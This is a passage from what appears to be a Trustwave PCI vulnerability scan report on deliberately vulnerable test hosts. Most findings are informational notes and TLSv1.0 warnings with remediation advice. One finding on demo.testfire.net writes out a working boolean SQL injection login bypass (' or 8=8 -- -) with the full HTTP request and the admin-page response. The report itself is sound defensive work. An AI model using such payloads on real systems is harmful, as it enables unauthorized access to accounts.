CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

6 Unknown services found 0.0 Info Pass The finding reports all ports and protocols that couldn't be remotely
identified. Particular items may indicate uncommon but safe protocols
or in-house application that uses custom and/or proprietary protocol.
However they can as well indicate malicious activity (backdoors,
rootkits, any other types of malware). This finding is purely
informational.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
Unknown Service: transport protocol: tcp, port: 80, ssl: false, banner:
(N/A)
Unknown Service: transport protocol: tcp, port: 443, ssl: false, banner:
(N/A)

Remediation:
Review items mentioned in this finding one by one and ensure the
services are known and accounted for in your security plan.

7 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
cpe: cpe:/h:linksys:befw11s4
ip_address: 204.13.201.47
os_name: embedded

8 NTP Service Not 0.0 Info Pass Port: udp/123

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 38 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

crackme.cenzic.com (MV PCI2)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Synchronized The NTP service on this server does not appear to be synchronized
based on it's Leap Indicator error status.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: ntp

Remediation:
Ensure the NTP server is properly synced with an authoritative time
source.

9 Service Detected 0.0 Info Pass Port: tcp/80

This service responded to network probes.


CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
ip_address: 204.13.201.47
port_number: 80
transport_protocol: tcp

10 Service Detected 0.0 Info Pass Port: tcp/443

This service responded to network probes.


CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
ip_address: 204.13.201.47
port_number: 443
transport_protocol: tcp

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 39 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

crackme.cenzic.com (MV PCI2)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

crackme.trustwave.com (MV PCI3)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

1 System Responds to 0.0 Low Pass Port: tcp/443


SYN+FIN TCP Packets
This device responded to a TCP packet with both the SYN and FIN bits
set. Such packets do not occur in typical network traffic, but can be
used by attackers to bypass the security rules configured in non-
stateful firewalls and establish connections with protected hosts.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Reference:
http://www.kb.cert.org/vuls/id/464113

Remediation:
Verify that stateful inspection has been implemented on the network to
protect this host from out-of-state attacks. Confirm with your vendor
that there are no known rule-bypass concerns with this device, and
that the software revision is current. You may additionally wish to
create specific filtering rules designed to drop or reject packets with
certain combinations of bits set in initial synchronization packets such
as SYN/FIN, and SYN/RST. Do not use routable IP space internally,
except within your DMZ.

2 System Responds to 0.0 Low Pass Port: tcp/80

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 40 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

crackme.trustwave.com (MV PCI3)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

SYN+FIN TCP Packets This device responded to a TCP packet with both the SYN and FIN bits
set. Such packets do not occur in typical network traffic, but can be
used by attackers to bypass the security rules configured in non-
stateful firewalls and establish connections with protected hosts.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Reference:
http://www.kb.cert.org/vuls/id/464113

Remediation:
Verify that stateful inspection has been implemented on the network to
protect this host from out-of-state attacks. Confirm with your vendor
that there are no known rule-bypass concerns with this device, and
that the software revision is current. You may additionally wish to
create specific filtering rules designed to drop or reject packets with
certain combinations of bits set in initial synchronization packets such
as SYN/FIN, and SYN/RST. Do not use routable IP space internally,
except within your DMZ.

3 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
cpe: cpe:/h:synology:rt1900ac
ip_address: 204.13.201.47
os_name: embedded

4 NTP Service Not 0.0 Info Pass Port: udp/123

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 41 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

crackme.trustwave.com (MV PCI3)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Synchronized The NTP service on this server does not appear to be synchronized
based on it's Leap Indicator error status.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: ntp

Remediation:
Ensure the NTP server is properly synced with an authoritative time
source.

5 Service Detected 0.0 Info Pass Port: tcp/443

This service responded to network probes.


CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
ip_address: 204.13.201.47
port_number: 443
transport_protocol: tcp

6 Service Detected 0.0 Info Pass Port: udp/123

This service responded to network probes.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: ntp

Evidence:
application_protocol: ntp

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 42 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

crackme.trustwave.com (MV PCI3)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
ip_address: 204.13.201.47
port_number: 123
transport_protocol: udp

7 Service Detected 0.0 Info Pass Port: tcp/80

This service responded to network probes.


CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
ip_address: 204.13.201.47
port_number: 80
transport_protocol: tcp

8 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
hostname: crackme.trustwave.com
ip_address: 204.13.201.47

9 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
hostname: crackme.trustwave.com
ip_address: 204.13.201.47

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 43 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

crackme.trustwave.com (MV PCI3)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

10 Unknown services found 0.0 Info Pass The finding reports all ports and protocols that couldn't be remotely
identified. Particular items may indicate uncommon but safe protocols
or in-house application that uses custom and/or proprietary protocol.
However they can as well indicate malicious activity (backdoors,
rootkits, any other types of malware). This finding is purely
informational.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
Unknown Service: transport protocol: tcp, port: 80, ssl: false, banner:
(N/A)
Unknown Service: transport protocol: tcp, port: 443, ssl: false, banner:
(N/A)

Remediation:
Review items mentioned in this finding one by one and ensure the
services are known and accounted for in your security plan.

crackmebank.campbell.devlab (MV PCI4)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

1 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
hostname: crackmebank.campbell.devlab

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 44 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

crackmebank.campbell.devlab (MV PCI4)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
ip_address: 10.76.128.61

2 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
hostname: crackmebank.campbell.devlab
ip_address: 10.76.128.61

cyclone.ciphertechs.com
CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

1 Hostname could not be 0.0 Low Fail This hostname's IP address could not be resolved using DNS resolution.
Resolved
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Reference:
https://www3.trustwave.com/support/kb/KnowledgebaseArticle20965.a
spx

Remediation:
Make sure you have correctly entered the fully qualified domain name
for the host you are trying to scan. Consider working with your ISP (or
your IT network manager, if this is an internal scan) to validate that
DNS is configured correctly.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 45 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

cyclone.ciphertechs.com
CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

1 TLSv1.0 Supported 10.0 High Fail Port: tcp/443

This service supports the use of the TLSv1.0 protocol. The TLSv1.0
protocol has known cryptographic weaknesses that can lead to the
compromise of sensitive data within an encrypted session. Additionally,
the PCI SSC and NIST have determined that the TLSv1.0 protocol no
longer meets the definition of strong cryptography.

CVSSv2: AV:N/AC:L/Au:N/C:C/I:C/A:C
Service: https
Application: apache:tomcat, apache:tomcat

Reference:
https://www.pcisecuritystandards.org/documents/Migrating_from_SSL_E
arly_TLS_Information%20Supplement_v1.pdf

https://www.pcisecuritystandards.org/pdfs/15_04_15%20PCI%20DSS%2
03%201%20Press%20Release.pdf
https://www.trustwave.com/Resources/SpiderLabs-Blog/Bring-Out-Your-
Dead--An-Update-on-the-PCI-relevance-of-
SSLv3/?page=1&year=0&month=0
https://www3.trustwave.com/support/vulnerabilitymanagement/tls/

Evidence:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 46 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA

Remediation:
The server should be configured to disable the use of the TLSv1.0
protocol in favor of cryptographically stronger protocols such as
TLSv1.1 and TLSv1.2. For services that already support TLSv1.1 or
TLSv1.2, simply disabling the use of the TLSv1.0 protocol on this
service is sufficient to address this finding. Please note the port
associated with this finding. This finding may NOT be originating from
port 443, which is what most online testing tools check by default.
NOTE: as of June 30th, 2018, Risk Mitigation & Migration plans were not
considered a PCI exception to this finding: the instance of SSLv3 must
be remediated properly.

2 TLSv1.0 Supported 10.0 High Fail Port: tcp/8443

This service supports the use of the TLSv1.0 protocol. The TLSv1.0
protocol has known cryptographic weaknesses that can lead to the
compromise of sensitive data within an encrypted session. Additionally,
the PCI SSC and NIST have determined that the TLSv1.0 protocol no
longer meets the definition of strong cryptography.

CVSSv2: AV:N/AC:L/Au:N/C:C/I:C/A:C
Service: https
Application: apache:tomcat, apache:tomcat

Reference:
https://www.pcisecuritystandards.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 47 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
org/documents/Migrating_from_SSL_Early_TLS_Information%20Supplem
ent_v1.pdf
https://www.pcisecuritystandards.org/pdfs/15_04_15%20PCI%20DSS%2
03%201%20Press%20Release.pdf
https://www.trustwave.com/Resources/SpiderLabs-Blog/Bring-Out-Your-
Dead--An-Update-on-the-PCI-relevance-of-
SSLv3/?page=1&year=0&month=0
https://www3.trustwave.com/support/vulnerabilitymanagement/tls/

Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA

Remediation:
The server should be configured to disable the use of the TLSv1.0
protocol in favor of cryptographically stronger protocols such as
TLSv1.1 and TLSv1.2. For services that already support TLSv1.1 or
TLSv1.2, simply disabling the use of the TLSv1.0 protocol on this
service is sufficient to address this finding. Please note the port
associated with this finding. This finding may NOT be originating from
port 443, which is what most online testing tools check by default.
NOTE: as of June 30th, 2018, Risk Mitigation & Migration plans were not
considered a PCI exception to this finding: the instance of SSLv3 must
be remediated properly.

3 SQL Injection Vulnerability 7.5 High Fail URL: http://demo.testfire.net:8080/doLogin


Port: tcp/8080

A SQL injection vulnerability (SQLi) was identified in this web

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 48 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://demo.testfire.net:8080/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://demo.testfire.net:8080/doLogin HTTP/1.1
Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 49 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Content-Type: application/x-www-form-urlencoded

uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6706
Date: Tue, 06 Aug 2019 04:33:42 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 50 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 51 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">


<!-- MEMBER TOC BEGIN -->

<table cellspacing="0" width="100%">

<td valign="top" class="cc br bb">


<br style="line-height: 10px;"/>
<b>I WANT TO ...</b>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="/bank/main.jsp">View
Account Summary</a></li>
<li><a id="MenuHyperLink2" href="/bank/transaction.jsp"
>View Recent Transactions</a></li>
<li><a id="MenuHyperLink3" href="/bank/transfer.jsp"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 52 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
>Transfer Funds</a></li>
<!-- <li><a id="MenuHyperLink3" href="
/bank/stocks.jsp">Trade Stocks</a></li>-->

<li><a id="MenuHyperLink4" href="/bank/queryxpath.jsp"


>Search News Articles</a></li>
<li><a id="MenuHyperLink5" href="/bank/customize.jsp"
>Customize Site Language</a></li>
</ul>

<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>

</ul>
</span>

</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">

<div class="fl" style="width: 99%;">

<h1>Hello Admin User


</h1>

<p>
Welcome to Altoro Mutual Online.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 53 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</p>

<form name="details" method="get" action="


showAccount">
<table border="0">
<TR valign="top">
<td>View Account Details:</td>
<td align="left">
<select size="1" name="listAccounts" id="
listAccounts">
<option value="800000" >800000
Corporate</option>
<option value="800001" >800001 Checking</option>
<option value="800002" >800002 Savings</option>
<option value="800003" >800003 Checking</option>
<option value="800004" >800004 Savings</option>
<option value="800005" >800005 Checking</option>
<option value="800006" >800006 Savings</option>
<option value="800007" >800007 Checking</option>
<option value="4539082039396288" >4539082039396288 Credit
Card</option>
<option value="4485983356242217" >4485983356242217 Credit
Card</option>

</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 54 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
href='apply.jsp'>Here</a> to apply.
</td></tr></table></span></td>
</tr>
</table>
</form>

</div>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 55 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>
</div>

</body>
</html>
<!-- END FOOTER -->
False Request: POST http://demo.testfire.net:8080/doLogin HTTP/1.1
Origin: http://demo.testfire.net:8080

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 56 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:33:43 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 57 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 58 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 59 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4"
href="index.jsp?content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5"
href="index.jsp?content=personal_investments.htm">Investments
&amp; Insurance</a></li>
<li><a id="MenuHyperLink6"
href="index.jsp?content=personal_other.htm">Other
Services</a></li>
</ul>

